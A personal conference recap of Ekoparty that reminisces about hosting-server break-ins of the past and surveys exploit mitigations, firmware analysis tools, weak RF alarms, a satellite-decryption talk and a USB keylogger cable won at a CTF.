Like many others, I got into software security as a student and used to dig into all sorts of related topics. Going to Ekoparty kind of reminded me of those days, but things that were simple back then have progressed. It's an infinite battle between hackers and software developers: once one finds a leak, the others think up a fix, sometimes making life harder on both ends. And vice versa. Things that were written in assembler in the 90s (it can be really hard to understand the idea behind the code) are written in C#, Java, or other interpreted languages that are basically "obfuscated source code" with tools ready to decompile it back to sources. I thought it was over when I first saw a virus written in Delphi. DeDe (Delphi Decompiler) was released a few years earlier, the virus was 1Mb in size and it would take a minute just to download it on dial-up speeds, while the relevant assembler solution would fit in 30Kb. But it's not.
Old school
I remember seeing an old TV interview with hackers of that time. They were breaking into some old bank networks, starting their way from hosting providers. I believe these days they‘ve founded security audit companies, but back then they agreed to reveal the techniques they used and what issues they had.
Everybody loves web apps and that’s how they found their way in. Web apps usually need some backend; a code that runs on a server hosting the app and feeding it with data. Often, when you develop a backend, your priority is just to make it work. Security is always a consideration, but if you’re not familiar with (constantly changing and improving) attack vectors, there isn’t much you can do.
These guys were looking for any breach in the backend good enough to get a shell on a hosting company server. Next steps were obvious:
- Clean up the logs
- Install a rootkit to make sure you won’t easily lose your shell even if a breach is fixed by upgrades or the (accidental) actions of a server administrator
- Explore local network to see if there are more vulnerable servers
- Add an extra payload to the pages that same server hosts for other clients
- Trade shell and/or data in darknet
Back then, if you had access to a hosting server, you had access to every single client it hosted. No hardware virtualization was used and different clients were served by different virtual hosts.
What changed?
For the rootkit part, modern OSs like Windows (starting from version 98, released in 1998) or MacOS (starting from OS X El Capitan, released in 2016) has built-in system files integrity checks. The most common way to install a rootkit was to modify a native-looking file that no one would ever suspect or recognize in their system. Integrity checks (SFC on Windows, SIP on MacOS, etc.) can do a complete automatic scan of system files and restore corrupted ones when found.
Is it helping? To some degree. More precisely, to the degree to which you manage to load your code on memory to hijack kernel calls so it supplies an unmodified file instead of the one you’ve used to load itself. Is it hard? It was at first. These days, all it takes is a git clone, and anyone can have a piece of technology at their fingertips that took someone years of experience to develop.
As for breaking into all hosted clients, virtualization helped a lot. Instead of keeping all sites on one server, hosting providers create virtual servers for each client. By design, it’s supposed to be separate environments. But remember the Meltdown and Spectre buzz last year? Those were attempts to bypass hardware virtualization barriers. That’s where the battlefield has moved. Before, people were breaking into and protecting software, today hardware has become a lot more complex and usually contains some software itself, so people are now breaking and protecting hardware.
What can we do?
Surprisingly, there are tools aimed at automatically finding vulnerabilities in firmware. Check out Binary Ninja, a tool for static binary code and data flow analysis, which does an automatic vulnerabilities search. It wasn't possible a few years ago and now it's in production. Antivirus companies panicked, yelling "trust no one!" and "your BIOS may have a spy and you will never know it!" as everything including chips in your watch can be compromised on any stage of development.
One of the speeches I liked most at Ekoparty was about modern mitigation techniques making it harder to exploit software vulnerabilities. As time has gone on, existing techniques have made exploiting any vulnerabilities far more challenging:
- Relocation Read-Only (RELRO), makes the relocation sections used to resolve dynamically loaded functions read-only. This way, the GOT (Global Offset Table) can’t be overwritten and it’s harder to take control of execution.
- No Execute (NX), also known as Data Execution Prevention, marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code.
- Stack Canaries, a secret value placed on the stack which changes every time the program is started. Prior to a function return, the stack canary is checked and if it appears to be modified, the program exits immediately.
- Address Space Layout Randomization (ASLR), randomizes the location where system executables are loaded into memory.
- Position Independent Executables (PIE) are an output of the hardened package building A PIE binary and all its dependencies are loaded into random locations within virtual memory each time the application is executed. This makes Return Oriented Programming (ROP) attacks much more difficult to execute reliably.
You can examine existing executables for enabled protection layers using a checksec script. These are mostly deterrents, not full-proof solutions, though. It's still possible to bypass all of that in some circumstances, but it takes more time and dedication. At some point, someone trying to break through may think it’s not worth it and give up. So, that’s making the entry threshold higher. On the other side, security conferences like Ekoparty lower the barrier for you, providing plenty of information to resolve issues step by step.
And we keep learning
Another competition concerned RF (Radio Frequency). They showed how insecure common car or house alarms can be (especially ones equipped with remote control). If your house alarm has remote control, better turn it off before someone decides to record and analyze the data it transmits. Some companies order generic entry-level alarms, add branding, invest in marketing, and deliver a product with “unknown” protection qualities, sometimes advertised as innovative. It’s 2019, but alarms that were already easy to break in the 90s are still on the market. Today, someone could exploit those generic alarms with just a $5 Arduino and a $1 transmitter. Security can’t be based on obfuscation. Once the information is out, if there are no other protections, it’s over.
In another talk, they described how to decrypt a satellite’s signal based on a photograph from the assembling factory (if you happen to work at one - don't take photos). It was based on known Meteor M2 data, but the presenter mentioned that there’s a 20M euros fine in Spain for receiving signals you’re not supposed to and provided a step by step guide on how to do the decryption of the "unknown" protocol. He started by estimating the signal’s frequency based on the antenna size (as seen on the photo) and ended up using Ifsrintruder to do linear feedback shift register scramble reversal. That was nice.
Throughout the event, companies in attendance organized CTFs (Capture the Flag) and we managed to take second place in one, winning a USB Ninja. It’s an interesting gadget: a seemingly unremarkable charging cable that turns into a keylogger / remote control of the host it’s plugged in to. It’s white, so your only hope to avoid it is to beware white USB cables.
It was a compelling conference and, while not directly related to what I do every day, it reminded me how interesting penetration testing and security can be. Solving security issues effectively is an extremely complex task and anti-virus companies certainly have their work cut out for them. The field is constantly evolving, so there’s always something new to think about and I was glad to get an in-depth look into it.